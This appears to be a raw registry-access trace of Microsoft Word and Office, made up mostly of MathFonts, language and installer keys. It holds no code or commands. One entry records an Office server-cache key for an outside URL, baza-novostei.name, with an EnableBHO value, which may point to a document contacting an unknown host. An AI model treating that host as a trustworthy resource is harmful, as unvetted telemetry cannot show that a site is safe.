HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
AceFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109E60090400000000000F01FEC\Usage
AceFilesIntl_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
WxpFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
on/
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
qp/
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
wt/
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache
Version
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\http://baza-novostei.name/dir/info/priny/
EnableBHO
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
{E7E4BC40-E76A-11CE-A9BB-00AA004AE837} {000214E6-0000-0000-C000-000000000046} 0xFFFF
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\683B0
683B0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Arial Unicode MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Batang
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@BatangChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DFKai-SB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Dotum
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DotumChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@FangSong
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gulim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GulimChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gungsuh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GungsuhChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@KaiTi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Malgun Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft JhengHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft YaHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Mincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PGothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PMincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS UI Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@NSimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Agency FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aharoni
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Algerian
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Andalus
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Angsana New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
AngsanaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aparajita
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arabic Typesetting
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Narrow
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Rounded MT Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Unicode MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Baskerville Old Face
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Batang
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BatangChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bauhaus 93
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bell MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB Demi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bernard MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Blackadder ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Poster Compressed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Book Antiqua
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookman Old Style
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookshelf Symbol 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bradley Hand ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Britannic Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Broadway
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Browallia New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BrowalliaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Brush Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Californian FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calisto MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria Math
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Candara
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Castellar
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Centaur
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Schoolbook
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Chiller
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Colonna MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Comic Sans MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Consolas
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Constantia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cooper Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Corbel
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cordia New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
CordiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Courier New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Curlz MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DaunPenh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
David
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DFKai-SB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DilleniaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DokChampa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Dotum
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DotumChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ebrima
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Edwardian Script ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Elephant
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Engravers MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Bold ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Demi ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Light ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Medium ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Estrangelo Edessa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
EucrosiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Euphemia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FangSong
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Felix Titling
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Footlight MT Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Forte
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Book
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi Cond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Heavy
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium Cond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FrankRuehl
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FreesiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Freestyle Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
French Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gabriola
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Garamond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gautami
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Georgia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gigi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Ext Condensed Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gisha
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gloucester MT Extra Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Old Style
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Stout
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gulim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GulimChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gungsuh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GungsuhChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Haettenschweiler
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harlow Solid Italic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harrington
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
High Tower Text
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Impact
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Imprint MT Shadow
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Informal Roman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
IrisUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Iskoola Pota
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
JasmineUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Jokerman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Juice ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KaiTi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kalinga
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kartika
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Khmer UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KodchiangUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kokila
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kristen ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kunstler Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lao UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Latha
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Leelawadee
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Levenim MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
LilyUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Bright
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Calligraphy
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Console
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Fax
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Handwriting
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Typewriter
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Unicode
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Magneto
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Maiandra GD
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Malgun Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mangal
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Marlett
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Matura MT Script Capitals
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Himalaya
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft JhengHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft New Tai Lue
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft PhagsPa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Sans Serif
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Tai Le
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Uighur
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft YaHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Yi Baiti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam Fixed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mistral
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Modern No. 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mongolian Baiti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Monotype Corsiva
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MoolBoran
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Mincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Outlook
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PGothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PMincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Sans Serif
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Specialty
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS UI Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MT Extra
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MV Boli
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Narkisim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Engraved
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Solid
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
NSimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Nyala
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
OCR A Extended
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Old English Text MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Onyx
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palace Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palatino Linotype
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Papyrus
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Parchment
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua Titling MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Plantagenet Cherokee
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Playbill
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Poor Richard
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Pristina
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Raavi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rage Italic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ravie
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Extra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rod
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sakkal Majalla
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Script MT Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Print
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Semibold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Symbol
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shonar Bangla
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Showcard Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shruti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic Fixed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Snap ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Stencil
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sylfaen
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Symbol
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tahoma
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tempus Sans ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Times New Roman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Traditional Arabic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Trebuchet MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tunga
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed Extra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Utsaah
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vani
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Verdana
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vijaya
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Viner Hand ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vivaldi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vladimir Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vrinda
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Webdings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wide Latin
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\6F2B8
6F2B8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Security\Trusted Documents
LastPurgeTime
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
WORDFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
